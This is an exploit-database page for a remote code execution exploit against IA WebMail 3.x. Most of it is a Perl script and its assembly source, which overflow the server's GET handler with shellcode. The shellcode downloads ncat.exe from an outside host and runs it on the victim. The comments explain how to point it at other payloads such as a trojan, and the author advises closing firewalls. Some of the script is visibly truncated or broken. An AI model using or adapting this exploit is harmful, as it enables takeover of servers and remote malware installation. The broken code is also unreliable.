Suggest Exploit
IA WebMail
Peter Winter-Smith
Remote Code Execution
Product Name: IA WebMail
Affected Version From: IA WebMail 3.x
Affected Version To: IA WebMail 3.x
Patch Exists: NO
Related CWE:
Other Scripts:
Platforms Tested: Windows XP Home SP1, Windows 2000 Pro SP4

IA WebMail Remote Exploit

This exploit targets IA WebMail version 3.x using the iaregdll.dll version It uses a specific shellcode for downloading files from a URL and creating a file on the victim's machine. The shellcode is included in the exploit and can be modified to use different URLs and filenames. The exploit has been tested on Windows XP Home SP1 and Windows 2000 Pro SP4. It steals addresses from the iaregdll.dll module import tables, making it work on most servers without alteration. However, it may not work if the server is running a firewall that prevents the urldownloader from spawning a shell. This exploit is for proof-of-concept purposes only.


Close firewalls or use a different shellcode to handle firewall restrictions. This exploit is for proof-of-concept purposes only and should not be used maliciously.

Exploit-DB raw data:

#!/usr/bin/perl -w
# IA WebMail 3.x (iaregdll.dll version Remote Exploit
# Application Specific Shellcode: URL Downloader
#  - www elitehaven net/ncat.exe (downloaded)
#  - c:\nc.exe                          (created)
# By Peter Winter-Smith peter4020 hotmail com
# Shellcode included - will need reassembling to use different
# urls and files etc.
# Tested against:
#  - Windows XP Home SP1
#  - Windows 2000 Pro SP4
# Shellcode should work each time, since it steals it's addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
# Notes:
#  - WebMailsvr.exe exits without consuming 100% resources in most
#    cases.
#  - This has only been tested with IA WebMail 3.1, however it was
#    designed to exploit all versions.

use IO::Socket;

 print "Usage: iawebmail.pl <victim> <port>\n\n";

$shellcode =            "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
                        "\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
                        "\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
                        "\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
                        "\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
                        "\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
                        "\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
                        "\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
                        "\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
                        "\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
                        "\xFF\x36\x50\xFF\x15\x14\x52\x02" .
                        "\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
                        "\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
                        "\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
                        "\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
                        "\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
                        "\x15\x14\x52\x02\x10\x5A\x52\x31" .
                        "\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
                        "\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
                        "\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
                        "\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
                        "\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
                        "\x46\x69\x6C\x65\x41\xFF\x57\x69" .
                        "\x6E\x45\x78\x65\x63\xFF\x68\x74" .
                        "\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
                        "\x2E\x65\x6C\x69\x74\x65\x68\x61" .
                        "\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
                        "\x6E\x63\x61\x74\x2E\x65\x78\x65" .
                        "\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
                        "\x78\x65\xFF\x6B\x65\x72\x6E\x65" .

$victim = IO::Socket::INET->new(Proto=>'tcp',
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";


print "Done.\n";


##                            SHELLCODE                              #
# ; IA WebMail 3.x Shellcode (iaregdll.dll version
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [peter4020@hotmail.com]
# ;
# ; nasmw -fbin -o iashellcode.s iashellcode.asm
# bits 32
# int3
# jmp short killnull
# next:
# pop edi
# push ebp
# mov ebp, esp
# add esp, -24
# push edi
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# pop edi
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# lea edx, [esp+20]
# push edx
# jmp short over
# killnull:
# jmp short data
# over:
# mov esi, edx
# push dword [esi]
# call [100251DCh]	; LoadLibraryA
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# push eax
# call [10025214h]	; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
# pop edx
# push edx
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# call eax
# pop edx
# push edx
# push dword [edx-20]
# call [100251DCh]	; LoadLibraryA
# pop edx
# push edx
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# call [10025214h]	; GetProcAddress(kernel32.dll, WinExec);
# pop edx
# push edx
# xor ecx, ecx
# inc ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# call eax
# int3
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh

# milw0rm.com [2003-11-19]